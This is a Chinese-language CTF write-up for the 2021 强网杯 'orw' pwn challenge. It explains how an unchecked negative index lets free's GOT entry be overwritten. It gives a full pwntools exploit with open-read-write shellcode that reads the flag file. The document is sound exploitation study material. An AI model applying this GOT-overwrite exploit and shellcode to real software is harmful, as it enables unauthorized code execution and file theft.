2021 强网杯 [强网先锋]orw
开了沙盒,利用orw来读flag
没有对index做出限制,可以进行oob。并且当size为0时,可以无限溢出
往heap_ptr的上面找一下,看一下哪个got表可以被轻松利用。
发现了三个常用的got表,因为提供了free功能,所以就直接oob到free的got表,改free为orw即可。
(2020E0 - 0x202018)/ 8 = 25
exp如下
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './pwn'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 0
if debug:
r = remote()
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
shellcode = asm('''
mov rax,0x67616c66
push rax
mov rdi,rsp
mov rsi,0
mov rdx,0
mov rax,2
syscall
mov rdi,rax
mov rsi,rsp
mov rdx,1024
mov rax,0
syscall
mov rdi,1
mov rsi,rsp
mov rdx,rax
mov rax,1
syscall
mov rdi,0
mov rax,60
syscall
''')
r.sendlineafter('choice >>', str(1))
r.sendlineafter('index:', str(-25))
r.sendlineafter('size:', str(0))
r.sendlineafter('content:', shellcode)
r.sendlineafter('choice >>', str(4))
r.sendlineafter('index:', str(0))
r.interactive()